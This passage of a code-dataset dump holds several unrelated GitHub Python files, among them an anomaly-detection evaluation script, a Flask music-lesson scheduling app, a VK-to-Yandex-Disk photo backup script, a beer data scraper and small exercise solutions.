1\n break\n\n start = end\n end = start + window_duration\n\n # reCluster ...\n delete_index_candidate = [status[1] for status in all_path.values() if status[0] <= path_thres]\n if len(delete_index_candidate) / len(all_path) >= reCluster_thres:\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if data_status is 'main', all new cluster labels are 'abnormal' and label_status is 'auto'\n # if data_status is 'init', all new cluster labels are 'normal' and label_status is 'auto'\n 
do_reCluster(cluster_obj=denstream, data_status='main', current_time=start, label_map_reCluster=label_map_reCluster)\n # update cluster table when recluster finish\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n else:\n do_reCluster(cluster_obj=cedas, data_status='main', current_time=start, label_map_reCluster=label_map_reCluster)\n \n # visualization ...\n # if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if len((denstream.p_micro_clusters+denstream.o_micro_clusters)) > 1:\n # denstream.visualization_tool()\n # else:\n # if len(cedas.micro_clusters) > 1:\n # cedas.visualization_tool()\n # main loop end\n \n traceID_fw = open('./manual_traceID.txt', 'w')\n traceID_fw.write(str(traceID_list).replace('[', '').replace(']', '').replace('\\'', ''))\n traceID_fw.close()\n print('main loop end')\n \n\n print('--------------------------------')\n print(\"Evaluation for TraceStream\")\n # ========================================\n # Evaluation for AD\n # ========================================\n print('--------------------------------')\n a_acc = accuracy_score(a_true, a_pred)\n a_recall = recall_score(a_true, a_pred)\n a_prec = precision_score(a_true, a_pred)\n a_F1_score = (2 * a_prec * a_recall)/(a_prec + a_recall)\n print('AD accuracy score is %.5f' % a_acc)\n print('AD recall score is %.5f' % a_recall)\n print('AD precision score is %.5f' % a_prec)\n print('AD F1 score is %.5f' % a_F1_score)\n print('--------------------------------')\n\n # ========================================\n # Evaluation for RCA\n # ========================================\n print('--------------------------------')\n print(\"Top@{}:\".format(K[0]))\n TP = r_pred_count_0\n if TP != 0:\n hit_rate1 = r_pred_count_0 / r_true_count\n hit_rate2 = r_pred_count_0 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[1]))\n TP = r_pred_count_1\n if TP != 0:\n hit_rate1 = r_pred_count_1 / r_true_count\n hit_rate2 = r_pred_count_1 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[2]))\n TP = r_pred_count_2\n if TP != 0:\n hit_rate1 = r_pred_count_2 / r_true_count\n hit_rate2 = r_pred_count_2 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[3]))\n TP = r_pred_count_3\n if TP != 0:\n hit_rate1 = r_pred_count_3 / r_true_count\n hit_rate2 = r_pred_count_3 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n 
print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[4]))\n TP = r_pred_count_4\n if TP != 0:\n hit_rate1 = r_pred_count_4 / r_true_count\n hit_rate2 = r_pred_count_4 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('--------------------------------')\n print(r_pred_count_0, r_pred_count_1, r_pred_count_2)\n print(\"Done !\")\n\nif __name__ == '__main__':\n main()","repo_name":"ztk1996/TF-RCA","sub_path":"TraFlowRCA.py","file_name":"TraFlowRCA.py","file_ext":"py","file_size_in_byte":43647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"}
+{"seq_id":"10960822507","text":"# #1060 Positive Numbers by Neilor Tonin\n\n# Reading the 6 numbers.\npositive = 0\nfor i in range(0, 6):\n num = float(input())\n if num > 0:\n positive += 1\n\nprint(f\"{positive} valores positivos\")","repo_name":"iagorrr/Competitive-Programming-Algorithms","sub_path":"submissions/Becrowd/_1060(1).py","file_name":"_1060(1).py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"}
+{"seq_id":"28533317527","text":"def height(man):\n if man not in p_tree:\n return 0\n else:\n return 1 + height(p_tree[man])\n\n\np_tree = {}\nnumber = int(input('Enter the number of people: '))\nfor i in range(number - 1):\n print(i, 'pair:')\n child, parent = input().split()\n p_tree[child] = parent\n\nheights = {}\nfor man in set(p_tree.keys()).union(set(p_tree.values())):\n heights[man] = height(man)\n\nprint('The \"height\" of each family member:')\nfor key, value in sorted(heights.items()):\n print(key, value)","repo_name":"Ksenya280/Skillbox_homework","sub_path":"Module19/09_pedigree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"26476562282","text":"#define class\nclass fullname:\n fname=\"\"\n lname=\"\"\n def __init__(self, first , last):\n self.fname = first\n self.lname = last\n def display(self):\n print('your name:{}'.format(self.fname + ' ' + self.lname))\n\n#create class object\nf = fullname('Aman' , 'Verma')\n\n#show result\nf.display()\n","repo_name":"aman19gsp/AI-In-Enterprise-System","sub_path":"my_python.py","file_name":"my_python.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"26675463732","text":"import random\nimport os\nimport time\nimport sys\n\nINT_MAX = 2**31\nSIZE = [100000, 200000, 300000, 400000, 500000, 600000]\nfor cases in range(6):\n for ranges in range(3):\n filename = './test%r.%d' % (cases, ranges)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n with open(filename, 'w') as w:\n n = SIZE[cases]\n w.write(str(n) + '\\n')\n for i in range(n):\n w.write(str(random.randint(-INT_MAX, INT_MAX-1)) + 
'\n')\n print(\"Cases%r.Range%d\" % (cases, ranges))","repo_name":"Randyzhang98/Weikang-s-Data-House","sub_path":"ZSJ-Project/Project2/FINAL_VER/Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"18270469968","text":"from flask import render_template, flash, redirect, url_for, request, g\nfrom flask_login import current_user, login_required\nfrom datetime import datetime, date\nimport calendar\nfrom ics import Calendar, Event\nfrom dateutil import tz\nfrom time import strftime\nfrom app import db\nfrom app.models import Teachers, Accounts, Students, Instruments, Attendance, \\\n Recurring_type, Lessons, Week_days, Recurring_pattern, ContactType, \\\n Contact, Communication, CommunicationType\nfrom app.main import bp\nfrom app.main.forms import AddAccountForm, AddStudentForm, AddInstrumentForm, \\\n AttendanceForm, AddLessonForm\nfrom app.auth.forms import EditTeacherForm\n\n\n@bp.before_app_request\ndef before_request():\n # make sure this is all appropriate. especially g.today\n if current_user.is_authenticated:\n g.accounts = Accounts.view_all_accounts()\n g.account_abc = Accounts.get_account_alphabet(g.accounts)\n g.students = Students.view_all_students()\n g.student_abc = Students.get_student_alphabet(g.students)\n g.today = datetime.utcnow()\n\n\n@bp.route('/')\n@bp.route('/index')\n@login_required\ndef index():\n contact = Contact.query.all()\n communication = Communication.query.all()\n communicationType = CommunicationType.query.all()\n #linkingContactCommunication = linkingContactCommunication.query.all()\n attendance = Attendance.query.all()\n instruments = Instruments.query.all()\n students = Students.query.all()\n accounts = Accounts.query.all()\n user = current_user\n recurring = Recurring_type.query.all()\n recurring_pattern = Recurring_pattern.query.all()\n lessons = Lessons.query.all()\n days = Week_days.query.all()\n contactType = ContactType.query.all()\n\n cal = Calendar()\n event = Event()\n event.name = 'fun party'\n event.begin = '20140101 00:00:00'\n flash('Fix teacher admin check box')\n return render_template(\n 'index.html',\n title='Home',\n contact=contact,\n communication=communication,\n communicationType=communicationType,\n user=user,\n contactType=contactType,\n lessons=lessons,\n recurring_pattern=recurring_pattern,\n students=students,\n accounts=accounts,\n attendance=attendance,\n recurring=recurring,\n days=days,\n instruments=instruments)\n\n\n# add account\n@bp.route('/sign_up', methods=['GET', 'POST'])\n@login_required\ndef sign_up():\n h1 = 'Sign Up!'\n original_primary_email = \"\"\n original_secondary_email = \"\"\n edit = False\n form = AddAccountForm(\n original_primary_email,\n original_secondary_email,\n edit)\n\n # if form validates\n if form.validate_on_submit():\n # check if at least 1 phone num is given\n if (form.primary_cell_phone.data == \"\"\n and form.primary_home_phone.data == \"\"\n and form.secondary_cell_phone.data == \"\"\n and form.secondary_home_phone.data == \"\"):\n # wish I knew how to repopulate the form\n\n flash('Please enter a phone number')\n return redirect(url_for('main.sign_up'))\n\n account = Accounts(\n primary_fname=form.primary_fname.data.capitalize(),\n primary_lname=form.primary_lname.data.capitalize(),\n primary_cell_phone=form.primary_cell_phone.data,\n primary_email=form.primary_email.data,\n primary_home_phone=form.primary_home_phone.data,\n 
secondary_fname=form.secondary_fname.data.capitalize(),\n secondary_lname=form.secondary_lname.data.capitalize(),\n secondary_cell_phone=form.secondary_cell_phone.data,\n secondary_email=form.secondary_email.data,\n secondary_home_phone=form.secondary_home_phone.data\n )\n db.session.add(account)\n db.session.commit()\n flash('Account added!')\n\n return redirect(url_for('main.add_student', id=account.id))\n\n return render_template(\n 'add_account.html',\n title='Sign Up',\n h1=h1,\n form=form)\n\n\n@bp.route('/add_instrument', methods=['GET', 'POST'])\n@login_required\ndef add_instrument():\n # display Instruments.query.all() on right side, make it delete/editable?\n form = AddInstrumentForm()\n if form.validate_on_submit():\n instrument = Instruments(\n instrument=form.instrument.data.capitalize()\n )\n\n db.session.add(instrument)\n db.session.commit()\n flash('Instrument added!')\n\n return redirect(url_for('main.add_instrument'))\n return render_template(\n 'add_instrument.html',\n title='Add An Instrument',\n form=form)\n\n\n@bp.route('/add_lesson/', methods=['GET', 'POST'])\n@login_required\ndef add_lesson(id):\n flash('MAKE END DATE OPTIONAL')\n form = AddLessonForm()\n if form.validate_on_submit():\n teacher = form.teacher_ID.data\n user = str(current_user)\n # might want to change is_hour in model to end_time\n # and store that instead, or store both\n lesson = Lessons(\n student_ID=int(id),\n teacher_ID=teacher.id,\n start_date=form.start_date.data,\n end_date=form.end_date.data,\n start_time=form.start_time.data,\n is_hour=form.is_hour.data,\n is_recurring=form.is_recurring.data,\n created_by=user\n )\n\n # if form.recurring_radio.data == 'weekly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'bi-weekly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'monthly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'not_recurring':\n # lesson.is_recurring = False\n # year = int(lesson.start_date.strftime('%Y'))\n # month = int(lesson.start_date.strftime('%m'))\n # day = int(lesson.start_date.strftime('%d'))\n # day_of_week = calendar.weekday(year, month, day)\n # day_of_week = Week_days.query.filter_by(cal_ID=day_of_week).first()\n # p_day = lesson.start_date.strftime('%d')\n # print(day_of_week.id)\n\n # insert record in recurring_pattern table with lesson_ID\n db.session.add(lesson)\n db.session.commit()\n flash('Lesson added!')\n\n return redirect(url_for('main.index'))\n\n else:\n print(\"not valid\")\n\n return render_template(\n 'add_lesson.html',\n title='Add Lesson',\n form=form)\n\n\n@bp.route('/add_student/', methods=['GET', 'POST'])\n@login_required\n# pass account id in link - use to add student\ndef add_student(id):\n form = AddStudentForm()\n h1 = 'Add A Student'\n account = Accounts.query.get(id)\n # if form validates\n if form.validate_on_submit():\n\n teacher = form.teacher_ID.data\n instrument = form.instrument.data\n # add formatting so names are capitalized\n student = Students(\n\n account_ID=id,\n teacher_ID=teacher.id,\n first_name=form.first_name.data.capitalize(),\n last_name=form.last_name.data.capitalize(),\n instrument=instrument.instrument,\n notes=form.notes.data\n )\n db.session.add(student)\n db.session.commit()\n flash('Student added!')\n\n return redirect(url_for('main.view_account', id=id))\n\n else:\n print(\"not valid\")\n\n return render_template(\n 'add_student.html',\n title='Add Student',\n account=account,\n h1=h1,\n form=form)\n\n\n@bp.route('/delete_account/', methods=['GET', 
'POST'])\n@login_required\ndef delete_account(id):\n # figure out how to cascade attendance too\n account = Accounts.query.filter_by(id=id).first_or_404()\n\n attendance = Attendance. \\\n query.filter_by(account_ID=id).all()\n\n if attendance:\n for attended in attendance:\n db.session.delete(attended)\n\n db.session.delete(account)\n db.session.commit()\n\n flash('Account Deleted')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_account.html',\n account=account,\n title='Delete')\n\n\n@bp.route('/delete_student/', methods=['GET', 'POST'])\n@login_required\ndef delete_student(id):\n # figure out how to cascade attendance too\n student = Students.query.filter_by(id=id).first_or_404()\n\n attendance = Attendance. \\\n query.filter_by(student_ID=id).all()\n\n if attendance:\n for attended in attendance:\n db.session.delete(attended)\n\n db.session.delete(student)\n db.session.commit()\n\n flash('Student Deleted')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_student.html',\n student=student,\n title='Delete')\n\n\n@bp.route('/delete_teacher/', methods=['GET', 'POST'])\n@login_required\ndef delete_teacher(id):\n # figure out how to cascade attendance too\n teacher = Teachers.query.filter_by(id=id).first_or_404()\n\n db.session.delete(teacher)\n db.session.commit()\n # remind me\n flash('Teacher FIRED')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_teacher.html',\n teacher=teacher,\n title='Delete')\n\n\n@bp.route('/edit_account/', methods=['GET', 'POST'])\n@login_required\ndef edit_account(id):\n account = Accounts.query.filter_by(id=id).first_or_404()\n h1 = 'Edit Account'\n edit = True\n form = AddAccountForm(account.primary_email, account.secondary_email, edit)\n if form.validate_on_submit():\n\n # do not allow phone numbers to be blank\n if (form.primary_cell_phone.data == \"\"\n and form.primary_home_phone.data == \"\"\n and form.secondary_cell_phone.data == \"\"\n and form.secondary_home_phone.data == \"\"):\n # wish I knew how to repopulate the form\n\n flash('Please enter a phone number')\n return redirect(url_for('main.edit_account', id=id))\n\n account.primary_fname = form.primary_fname.data.capitalize()\n account.primary_lname = form.primary_lname.data.capitalize()\n account.primary_cell_phone = form.primary_cell_phone.data\n account.primary_email = form.primary_email.data\n account.primary_home_phone = form.primary_home_phone.data\n account.secondary_fname = form.secondary_fname.data.capitalize()\n account.secondary_lname = form.secondary_lname.data.capitalize()\n account.secondary_cell_phone = form.secondary_cell_phone.data\n account.secondary_email = form.secondary_email.data\n account.secondary_home_phone = form.secondary_home_phone.data\n\n db.session.commit()\n\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_account', id=id))\n\n elif request.method == 'GET':\n form.primary_fname.data = account.primary_fname\n form.primary_lname.data = account.primary_lname\n form.primary_cell_phone.data = account.primary_cell_phone\n form.primary_email.data = account.primary_email\n form.primary_home_phone.data = account.primary_home_phone\n form.secondary_fname.data = account.secondary_fname\n form.secondary_lname.data = account.secondary_lname\n form.secondary_cell_phone.data = account.secondary_cell_phone\n form.secondary_email.data = account.secondary_email\n form.secondary_home_phone.data = account.secondary_home_phone\n\n return render_template(\n 
'edit_account.html',\n title='Edit Account',\n form=form,\n h1=h1,\n account=account)\n\n\n@bp.route('/edit_student/', methods=['GET', 'POST'])\n@login_required\ndef edit_student(id):\n student = Students.query.filter_by(id=id).first_or_404()\n form = AddStudentForm()\n h1 = 'Edit Student'\n if form.validate_on_submit():\n\n teacher = form.teacher_ID.data\n instrument = form.instrument.data\n\n student.teacher_ID = teacher.id\n student.first_name = form.first_name.data.capitalize()\n student.last_name = form.last_name.data.capitalize()\n student.instrument = instrument.instrument\n student.notes = form.notes.data\n db.session.commit()\n\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_student', id=id))\n\n elif request.method == 'GET':\n\n form.first_name.data = student.first_name\n form.last_name.data = student.last_name\n form.notes.data = student.notes\n\n return render_template(\n 'edit_student.html',\n title='Edit Student',\n form=form,\n h1=h1,\n student=student)\n\n\n@bp.route('/edit_teacher/', methods=['GET', 'POST'])\n@login_required\ndef edit_teacher(id):\n teacher = Teachers.query.filter_by(id=id).first_or_404()\n form = EditTeacherForm(teacher.email, teacher.username, teacher.phone_num)\n if form.validate_on_submit():\n\n teacher.first_name = form.first_name.data.capitalize()\n teacher.last_name = form.last_name.data.capitalize()\n teacher.phone_num = form.phone_num.data\n teacher.email = form.email.data\n teacher.address = form.address.data\n teacher.city = form.city.data.capitalize()\n teacher.state = form.state.data\n teacher.zipcode = form.zipcode.data\n teacher.is_admin = form.is_admin.data\n teacher.notes = form.notes.data\n teacher.username = form.username.data\n\n db.session.commit()\n print('valid')\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_all_teachers'))\n\n elif request.method == 'GET':\n print('here')\n form.first_name.data = teacher.first_name\n form.last_name.data = teacher.last_name\n form.email.data = teacher.email\n form.address.data = teacher.address\n form.city.data = teacher.city\n form.state.data = teacher.state\n form.zipcode.data = teacher.zipcode\n form.is_admin.data = teacher.is_admin\n form.notes.data = teacher.notes\n form.username.data = teacher.username\n\n print('not valid')\n return render_template(\n 'edit_teacher.html',\n form=form,\n teacher=teacher,\n title='Edit')\n\n\n@bp.route('/view_account/', methods=['GET', 'POST'])\n@login_required\ndef view_account(id):\n account = Accounts.query.filter_by(id=id).first_or_404()\n\n return render_template(\n 'view_account.html',\n title='Account',\n account=account)\n\n\n@bp.route('/view_all_teachers', methods=['GET', 'POST'])\n@login_required\ndef view_all_teachers():\n teachers = Teachers.query.all()\n\n return render_template(\n 'view_all_teachers.html',\n title='Teachers',\n teachers=teachers)\n\n\n@bp.route('/view_student/', methods=['GET', 'POST'])\n@login_required\ndef view_student(id):\n # not checked in default\n checked_in = False\n # get student id\n student = Students.query.filter_by(id=id).first_or_404()\n # get account id\n account_ID = student.account_ID\n # get today's date. maybe delete this line\n today = strftime('%Y-%m-%d') # 2018-10-19\n # key word arguments for query\n kwargs = {'student_ID': id, 'account_ID': account_ID}\n # query attendance table with kwargs\n attendance = Attendance. 
\\\n        query.filter_by(**kwargs).order_by(Attendance.id.desc()).first()\n    # convert time zone from UTC to local time\n    from_zone = tz.tzutc()\n    to_zone = tz.tzlocal()\n    # get today's date\n    utc = g.today.replace(tzinfo=from_zone)\n    # convert time zone to local time zone\n    today_my_time = utc.astimezone(to_zone)\n    # check to see if student was checked in today\n    if attendance is not None:\n        # set dates student was present to var 'utc'\n        utc = attendance.was_present\n        # tell datetime object the timezone is utc since object is naive\n        utc = utc.replace(tzinfo=from_zone)\n        # convert time zone to local time zone\n        my_time_zone = utc.astimezone(to_zone)\n        # check to see if student was checked in today\n        if (today_my_time.strftime('%Y-%m-%d')\n                == my_time_zone.strftime('%Y-%m-%d')):\n            # set check_in = true, so template won't display check in option\n            checked_in = True\n\n    check_in_form = AttendanceForm()\n    undo_check_in_form = AttendanceForm()\n\n    if check_in_form.validate_on_submit() and checked_in is False:\n        # if not yet checked in template displays this version of the form\n        # adds a timestamp to db, checking student in\n        was_present = Attendance(\n\n            student_ID=student.id,\n            account_ID=student.account_ID\n        )\n\n        db.session.add(was_present)\n        db.session.commit()\n\n        return redirect(url_for('main.view_student', id=id))\n\n    # if student is checked in, template displays this version of the form\n    if undo_check_in_form.validate_on_submit() and checked_in is True:\n        # deletes the last record for that student in attendance table\n        delete_record = Attendance. \\\n            query.filter_by(**kwargs).order_by(Attendance.id.desc()).first()\n\n        # undoes the check in for today's date\n        db.session.delete(delete_record)\n        db.session.commit()\n        return redirect(url_for('main.view_student', id=id))\n\n    return render_template(\n        'view_student.html',\n        title='Student',\n        check_in_form=check_in_form,\n        undo_check_in_form=undo_check_in_form,\n        checked_in=checked_in,\n        attendance=attendance,\n        today=today,\n        student=student)\n\n\n@bp.route('/view_teacher/<id>', methods=['GET', 'POST'])\n@login_required\ndef view_teacher(id):\n    teacher = Teachers.query.get(id)\n\n    return render_template(\n        'view_teacher.html',\n        title='Teacher',\n        teacher=teacher)\n","repo_name":"iotenti/scheduling-app","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":19295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"8251276972","text":"from pprint import pprint\nimport requests\nimport os\nimport time\nfrom tqdm import tqdm\n\nmylist = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor i in tqdm(mylist):\n    time.sleep(1)\n\nvk_token = ''\n\n\ndef create_local_directory():\n    path = 'images'\n    os.mkdir(path)\n\n\ndef get_photo(owner_id, directory):\n    url_vk = 'https://api.vk.com/method/photos.get'\n    params_vk = {\n        'access_token': vk_token,\n        'owner_id': owner_id,\n        'album_id': 'wall',\n        'extended': 1,\n        'v': '5.131'\n    }\n    img = requests.get(url=url_vk, params=params_vk).json()\n    res_vk = img['response']['items']\n    for el in res_vk:\n        image_name = str(el['likes']['count'])\n        info = {}\n        info.setdefault(image_name, el['sizes'][9]['url'])\n        for k, v in info.items():\n            file_name = k + '.jpg'\n            img_data = requests.get(el['sizes'][9]['url']).content\n            with open(f'{directory}/{file_name}', 'wb') as file:\n                file.write(img_data)\n    return\n\n\nya_token = \"\"\n\n\nclass YaUploader:\n    def __init__(self, token: str):\n        self.token = token\n\n    def get_headers(self):\n        return {\n            
'Content-Type': 'application/json',\n            'Authorization': 'OAuth {}'.format(self.token)\n        }\n\n    def get_files_list(self):\n        files_url = 'https://cloud-api.yandex.net/v1/disk/resources/files'\n        headers = self.get_headers()\n        response = requests.get(files_url, headers=headers)\n        return response.json()\n\n    def _get_upload_link(self, disk_file_path):\n        upload_url = 'https://cloud-api.yandex.net/v1/disk/resources/upload'\n        headers = self.get_headers()\n        params = {'path': disk_file_path, 'overwrite': 'true'}\n        response = requests.get(url=upload_url, headers=headers, params=params)\n        return response.json()\n\n    def create_directory(self, dir_name: str):\n        url = \"https://cloud-api.yandex.net/v1/disk/resources/\"\n        headers = {\n            \"Accept\": \"application/json\",\n            \"Authorization\": \"OAuth \" + ya_token\n        }\n        params = {\n            'path': dir_name\n        }\n        r = requests.put(url=url, params=params, headers=headers)\n        res = r.json()\n\n    def upload_files_to_disk(self, disk_file_path, file_name):\n        self.create_directory('Photo_vk')\n        href = self._get_upload_link(disk_file_path=disk_file_path).get('href', '')\n        response = requests.put(url=href, data=open(file_name, 'rb'))\n        if response.status_code == 201:\n            pprint('Success')\n        else:\n            pprint('False')\n\n\nif __name__ == '__main__':\n    create_local_directory()\n    get_photo(310885834, 'images')\n    ya = YaUploader(token=ya_token)\n    ya.upload_files_to_disk('Photo_vk/26.jpg', 'images/26.jpg')\n    ya.upload_files_to_disk('Photo_vk/29.jpg', 'images/29.jpg')\n    ya.upload_files_to_disk('Photo_vk/6.jpg', 'images/6.jpg')\n    ya.upload_files_to_disk('Photo_vk/34.jpg', 'images/34.jpg')\n","repo_name":"BariGisher20/Backup","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"24043395487","text":"import argparse\nfrom datetime import datetime\n\nimport pandas as pd\nfrom utils import get_beer_styles, get_beer_style_info, get_brewery_info\n\n\nclass BeerMasterTables:\n    def get_master_table():\n        beer_style_links, beer_style_names = get_beer_styles()\n        beer_style_info_lists = [get_beer_style_info(n, l) for n,l in zip(beer_style_names, beer_style_links)]\n        beer_df = pd.concat(beer_style_info_lists, axis=0)\n        # beer_df.to_gbq(project_id='scarlet-labs',\n        #             destination_table=\"beer.beer_info_master_table\",\n        #             if_exists=\"replace\",\n        #             verbose=False)\n        return beer_df\n\n    def get_brewery_table():\n        beer_df = pd.read_gbq(project_id='scarlet-labs',\n                            query=\"select * from `scarlet-labs.beer.beer_info_master_table` order by ratings desc\",\n                            dialect='standard',\n                            verbose=False)\n        brewery_df_list = [get_brewery_info(x) for x in beer_df[\"brewery_link\"].unique()]\n        brewery_df = pd.concat(brewery_df_list).join(beer_df[[\"brewery_link\", \"brewery\"]].drop_duplicates().set_index(\"brewery_link\")).reset_index().rename(columns={\"index\":\"brewery_link\"})\n        # beer_df.to_gbq(project_id='scarlet-labs',\n        #             destination_table=\"beer.brewery_info\",\n        #             if_exists=\"replace\",\n        #             verbose=False)\n        return brewery_df\n\n\n\ndef main(argv=None):\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--table-type',\n                        dest='table_type',\n                        default = 'brewery',\n                        help='Brewery or Beers')\n\n    args, _ = parser.parse_known_args(argv)\n\n    if args.table_type.lower() == \"brewery\":\n        print((\"Getting Brewery Info\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n        df = BeerMasterTables.get_brewery_table()\n        print((\"Writing Output\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n        
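# --- Editor's note: illustrative sketch, not part of the original file. ---
# get_brewery_table() above builds the brewery table with an index join plus a
# reset_index()/rename() to turn the join key back into a column. The same
# pattern on toy, self-contained data (all names here are hypothetical):
import pandas as pd
scraped = pd.DataFrame({'rating': [4.2, 3.8]}, index=['url_a', 'url_b'])
names = pd.DataFrame({'brewery_link': ['url_a', 'url_b'],
                      'brewery': ['Alpha Brewing', 'Beta Brewing']}).set_index('brewery_link')
merged = scraped.join(names).reset_index().rename(columns={'index': 'brewery_link'})
print(merged)  # one row per link, with rating and brewery name side by side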
df.to_csv(\"brewery_info.csv\", index=False)\n else:\n print((\"Getting Master Info\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df = BeerMasterTables.get_master_table()\n print((\"Writing Output\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df.to_csv(\"beer_info_master_table.csv\", index=False)\n\nif __name__ == '__main__':\n main()\n","repo_name":"meirelon/beer-recommendations","sub_path":"BeerMasterTables.py","file_name":"BeerMasterTables.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73311596558","text":"# ------------------------------\n# 42. Trapping Rain Water\n# \n# Description:\n# Given n non-negative integers representing an elevation map where the width of each \n# bar is 1, compute how much water it is able to trap after raining.\n# (see picture on the website)\n# \n# Example:\n# Input: [0,1,0,2,1,0,1,3,2,1,2,1]\n# Output: 6\n# \n# Version: 2.0\n# 11/09/19 by Jianfa\n# ------------------------------\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n res = 0\n current = 0\n stack = []\n while current < len(height):\n while stack and height[current] > height[stack[-1]]:\n last = stack.pop()\n if not stack:\n # if stack is empty after popping last out\n break\n distance = current - stack[-1] - 1 # get horizontal distance between current and left bar of the last\n height_diff = min(height[stack[-1]], height[current]) - height[last] # get the height distance between a lower bar and height[last]\n res += distance * height_diff\n \n stack.append(current)\n current += 1\n \n return res\n\n# Used for testing\nif __name__ == \"__main__\":\n test = Solution()\n\n# ------------------------------\n# Summary:\n# Stack solution from https://leetcode.com/problems/trapping-rain-water/solution/\n# More concise than mine. It leverage the status of stack. If stack is empty, that means\n# current bar is the only higher bar than last bar so far. 
Otherwise, there must be a\n# higher bar to the left, forming a trap between it and the current bar.\n# Repeat this until there is no bar lower than the current one.\n# \n# O(n) time and O(n) space","repo_name":"Hellofafar/Leetcode","sub_path":"Hard/42_2.py","file_name":"42_2.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"}
